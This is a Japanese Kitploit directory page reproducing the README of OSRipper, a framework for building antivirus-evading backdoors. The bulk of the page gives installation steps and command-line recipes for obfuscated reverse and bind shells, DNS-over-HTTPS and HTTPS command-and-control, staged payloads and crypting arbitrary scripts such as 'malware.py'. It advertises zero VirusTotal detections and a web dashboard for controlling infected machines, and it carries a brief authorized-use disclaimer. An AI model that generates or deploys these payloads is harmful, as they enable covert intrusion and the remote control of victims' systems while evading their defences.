Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
OSRipper — AV回避クロスプラットフォームのバックドアおよび暗号化フレームワーク、統合された軽量WebUIを搭載 | Kitploit
ツール/GitHubGitHub/noahoksuz/osripper
エクスプロイトフレームワークペイロード生成IDS/IPS回避ポストエクスプロイトペネトレーションテストコマンド&コントロール学習と教育レッドチーミング
GitHubnoahoksuz/osripper

OSRipper

AV回避クロスプラットフォームのバックドアおよび暗号化フレームワーク、統合された軽量WebUIを搭載

リポジトリを見る
32850586ヶ月前Kitploit レビュー済み
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

高度なクロスプラットフォームペイロード生成・暗号化ツール(FUD対応)

機能 • クイックスタート • Web UI • ペイロードタイプ • ドキュメント


概要

OSRipper は、許可されたペネトレーションテストやレッドチームオペレーション向けに設計された、洗練された完全検出回避(FUD)バックドア生成・暗号化ツールです。高度な回避技術、複数のペイロードタイプ、そして最新の Web ベース C2 インターフェースを備え、感染システムの管理を行います。

主な特長

  • 完全検出回避(FUD) - 高度な回避技術で最新の AV ソリューションを回避
  • Web ベース C2 インターフェース - アクティブセッションを管理するモダンなダッシュボード
  • 複数のペイロードタイプ - バインドシェル、リバースシェル、DoH C2、HTTPS C2 など
  • 多層難読化 - ランダム変数による標準・強化難読化
  • バイナリコンパイル - ペイロードをスタンドアロン実行可能ファイルにコンパイル
  • 暗号化通信 - SSL/TLS および証明書ピン留め HTTPS C2 チャネル
  • ステルス機能 - VM 検出、アンチデバッグ、プロセス偽装

  • 機能

    ペイロード生成

    ペイロードタイプ説明ユースケース
    バインドシェル被害マシン上でポートを開放リバース接続がブロックされている場合の直接アクセス
    リバース TCP MeterpreterSSL/TLS 暗号化リバース接続標準的なペネトレーションテスト
    DNS-over-HTTPS C2DoH ベースのステルス C2 通信ネットワーク制限の回避
    HTTPS C2証明書ピン留め HTTPS C2安全で認証済みの C2 チャネル
    ステージドペイロード多段階 Web 配信ステルス性を高めた展開
    カスタムコード暗号化任意の Python スクリプトの難読化カスタムペイロードの暗号化

    回避技術

    • 高度難読化 - ランダム変数を用いた多層コードエンコーディング
    • 強化難読化 - アンチデバッグ、VM 検出、ジャンクコード注入
    • アンチ VM 検出 - サンドボックスおよび仮想マシン回避
    • ステルス遅延 - ランダムな起動遅延(5~15 秒)
    • プロセス偽装 - 正規のシステムプロセスへの偽装
    • シグネチャランダマイゼーション - 毎回ユニークなペイロード生成

    Web UI 機能

    • セッションダッシュボード - すべてのアクティブ C2 セッションの表示
    • インタラクティブターミナル - Web インターフェース経由でのコマンド実行
    • ペイロードジェネレーター - Web UI から直接ペイロードを生成
    • セッション管理 - システム情報表示、コマンド履歴、セッション管理
    • リアルタイム更新 - ライブコマンド実行と応答表示

    高度な機能

    • Ngrok 統合 - 動的 IP のための自動トンネル作成
    • 証明書ピン留め - 証明書検証による安全な HTTPS C2
    • セッション永続化 - 再起動後も接続を維持
    • コマンドキューイング - オフラインエージェントへのコマンドキュー
    • 応答解析 - コマンド出力の自動解析

    クイックスタート

    インストール

    root@kitploit:~
    # リポジトリのクローン
    git clone https://github.com/SubGlitch1/OSRipper.git
    cd OSRipper
    
    # 依存関係のインストール
    pip3 install -r requirements.txt
    
    # パッケージのインストール
    pip3 install -e .
    

    重要 — オプション機能(ngrok、バイナリコンパイル)を使用するためのセットアップ:
    多くのシステム(特に外部管理 Python 環境の Linux)では、OSRipper 独自の venv にオプション依存関係をインストールするために、ビルトインセットアップを 必ず 実行する必要があります。インストール後に一度だけ実行してください。

    root@kitploit:~
    osripper-cli setup
    

    これにより ~/.local/share/osripper/venv が作成され、pyngrok、nuitka、sandboxed がインストールされます。以降の osripper / osripper-cli の実行では自動的にこれらが使用されます。これを実行しない場合、--ngrok や --compile を使用するたびにセットアップを促すプロンプトが表示されます。システム全体またはユーザー pip インストールを希望する場合は、osripper-cli setup --system を使用してください。

    基本的な使い方

    対話モード:

    root@kitploit:~
    osripper
    # または
    python3 -m osripper
    

    コマンドライン:

    root@kitploit:~
    # リバースシェルの生成
    osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
    
    # DoH C2 ペイロードの生成
    osripper-cli doh -d example.com --obfuscate --compile
    

    Web UI:

    root@kitploit:~
    # Web UI 付き C2 サーバーの起動
    python -m osripper.c2.server example.com --port 5000
    
    # ダッシュボードにアクセス http://localhost:5000
    

    Web UI

    OSRipper には、感染システムを管理するためのモダンな Web ベース C2 インターフェースが含まれています。

    機能

    • ダッシュボード - すべてのアクティブセッションの概要
    • セッション管理 - システム情報の表示とコマンド実行
    • ペイロードジェネレーター - Web インターフェース経由で DoH および HTTPS ペイロードを生成
    • コマンド履歴 - 実行されたすべてのコマンドと応答を追跡
    • リアルタイム更新 - ライブコマンド実行と応答表示

    C2 サーバーの起動

    root@kitploit:~
    # 基本的な使い方
    python -m osripper.c2.server example.com
    
    # HTTPS 使用
    python -m osripper.c2.server example.com --https
    
    # カスタムポート
    python -m osripper.c2.server example.com --port 8080
    
    # カスタム証明書使用
    python -m osripper.c2.server example.com --https --cert server.crt --key server.key
    

    Web UI へのアクセス

    サーバー起動後、以下の URL でダッシュボードにアクセスできます。

    • HTTP: http://localhost:5000
    • HTTPS: https://localhost:5000(有効な場合)

    ペイロードタイプ

    1. バインドシェルバックドア

    被害マシン上でポートを開放し、接続を待ち受けます。

    root@kitploit:~
    osripper-cli bind -p 4444 --obfuscate --compile
    

    接続:

    root@kitploit:~
    msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
    

    2. リバース TCP Meterpreter

    SSL/TLS で暗号化されたリバース接続。

    root@kitploit:~
    osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
    

    3. DNS-over-HTTPS C2

    DNS-over-HTTPS プロトコルを使用したステルス C2 チャネル。多くのネットワーク制限を回避します。

    root@kitploit:~
    # ペイロード生成
    osripper-cli doh -d example.com --obfuscate --compile
    
    # C2 サーバー起動
    python -m osripper.c2.server example.com
    

    機能:

    • DNS ベースのステルス通信
    • セッション管理用 Web UI
    • 自動セッション永続化
    • オフラインエージェント用コマンドキューイング

    4. HTTPS C2(証明書ピン留め)

    認証用に証明書ピン留めを使用した安全な HTTPS C2。

    root@kitploit:~
    # ペイロード生成(Web UI または CLI 経由)
    # HTTPS で C2 サーバー起動
    python -m osripper.c2.server example.com --https
    
    # 証明書フィンガープリントの取得
    curl http://localhost:5000/api/cert-fingerprint
    

    機能:

    • セキュリティのための証明書ピン留め
    • 暗号化 HTTPS 通信
    • Web UI 統合
    • セッション管理

    5. ステージドペイロード

    多段階 Web 配信によるステルス性の向上。

    root@kitploit:~
    osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
    

    6. カスタムコード暗号化

    任意の Python スクリプトを難読化・暗号化します。

    root@kitploit:~
    osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
    

    コマンドラインインターフェース

    共通オプション

    オプション説明
    --obfuscate多層難読化を有効化
    --enhanced強化難読化(アンチデバッグ、VM 検出)
    --compileスタンドアロンバイナリにコンパイル
    --icon PATHコンパイル済みバイナリ用のカスタムアイコン
    --delayランダムな起動遅延を追加(5~15 秒)
    --output, -o NAME出力ファイル名
    --quiet, -qサイレントモード(最小限の出力)

    例

    root@kitploit:~
    # フル機能のリバースシェル
    osripper-cli reverse -H 192.168.1.100 -p 4444 \
      --obfuscate --enhanced --compile --icon app.ico --delay
    
    # 全機能を備えた DoH C2
    osripper-cli doh -d example.com \
      --obfuscate --enhanced --compile --delay
    
    # カスタムスクリプトの暗号化
    osripper-cli custom --script malware.py \
      --obfuscate --enhanced --compile
    
    # ngrok を使用した動的 IP
    osripper-cli reverse --ngrok -p 4444 --obfuscate --compile
    

    検出結果

    最新の VirusTotal スキャン

    • Python ペイロード: 0/68 検出率
    • コンパイル済みバイナリ: 0/68 検出率

    antiscan 結果

    Antiscan Results


    アーキテクチャ

    root@kitploit:~
    ┌─────────────────┐
    │   Generated     │
    │    Binary       │
    └─────────────────┘
             │
             │ Execute
             ▼
    ┌──────────────────┐
    │ Obfuscated       │
    │ Dropper          │
    └──────────────────┘
             │
             │ HTTP/HTTPS/DoH
             ▼
    ┌─────────────────┐
    │                 │
    │   C2 SERVER     │
    │   (Web UI)      │
    │                 │
    └─────────────────┘
             │
             │ Command/Response
             ▼
    ┌─────────────────┐
    │   Agent         │
    │   Execution     │
    └─────────────────┘
    

    スクリーンショット

    メインインターフェース

    Web UI ダッシュボード

    Web UI Dashboard


    高度な設定

    Ngrok 統合

    root@kitploit:~
    # ngrok を使用したペイロード生成
    osripper-cli reverse --ngrok -p 4444
    
    # プロンプトに従ってトンネルを設定
    # 実行: ngrok tcp 4444
    

    カスタムアイコン

    root@kitploit:~
    osripper-cli reverse -H 192.168.1.100 -p 4444 \
      --compile --icon /path/to/icon.ico
    

    難読化レベル

    標準難読化:

    • 多層エンコーディング
    • 変数ランダマイゼーション
    • コード構造の難読化

    強化難読化:

    • 標準機能すべて
    • アンチデバッグ技術
    • VM 検出
    • ジャンクコード注入
    • 高度な回避
    root@kitploit:~
    # 標準
    osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
    
    # 強化
    osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced
    

    HTTPS C2 のセットアップ

    root@kitploit:~
    # 1. HTTPS で C2 サーバーを起動
    python -m osripper.c2.server example.com --https
    
    # 2. 証明書フィンガープリントを取得
    curl http://localhost:5000/api/cert-fingerprint
    
    # 3. フィンガープリントを使用してペイロードを生成(Web UI 経由)
    # またはペイロード生成時にフィンガープリントを使用
    

    ドキュメント

    • Wiki - 包括的なドキュメント
    • 使用ガイド - 詳細な使用手順
    • API リファレンス - 開発者向けドキュメント

    ロードマップ

    完了(v0.3.2)

    • FUD ペイロード生成(0/68 検出)
    • Web ベース C2 インターフェース
    • DNS-over-HTTPS C2 ペイロード
    • 証明書ピン留め付き HTTPS C2
    • 多層難読化エンジン
    • セッション管理システム
    • コマンドキューイングと実行
    • アンチ VM 検出
    • プロセス偽装

    進行中

    • 強化されたポストエクスプロイテーションモジュール
    • 高度な永続化メカニズム
    • Web UI からのファイルアップロード/ダウンロード
    • C2 サーバーのマルチユーザーサポート

    将来計画

    • AI を活用した回避技術
    • ブロックチェーンベースの C2 インフラストラクチャ
    • モバイルプラットフォームサポート
    • 高度なソーシャルエンジニアリングペイロード

    コントリビューション

    セキュリティ研究コミュニティからのコントリビューションを歓迎します。

    コントリビューション方法

    1. リポジトリをフォーク
    2. フィーチャーブランチを作成 (git checkout -b feature/amazing-feature)
    3. 変更をコミット (git commit -m '素晴らしい機能を追加')
    4. ブランチにプッシュ (git push origin feature/amazing-feature)
    5. プルリクエストを開く

    開発ガイドライン

    • PEP 8 コーディング規約に準拠
    • すべての関数にドキュメンテーション文字列を追加
    • 複数のプラットフォームでテスト
    • FUD 機能を維持

    謝辞

    セキュリティ研究コミュニティと以下のプロジェクトに感謝します。

    • htr-tech/PyObfuscate - 難読化の着想
    • cedowens/SwiftBelt - macOS 列挙
    • Metasploit Framework - ペイロード処理

    法的免責事項

    重要: このツールは教育目的および許可されたペネトレーションテストのために開発されました。

    • 許可される使用: セキュリティ研究、ペネトレーションテスト、レッドチーム演習
    • 禁止される使用: 不正アクセス、悪意のある活動、違法行為

    開発者は本ソフトウェアの誤用について一切の責任を負いません。ユーザーは適用されるすべての法律および規制を遵守する必要があります。


    サポート

    • バグ報告: Issue を開く
    • 機能リクエスト: ディスカッション
    • セキュリティ問題: メンテナーに非公開で連絡
    ツールをダウンロード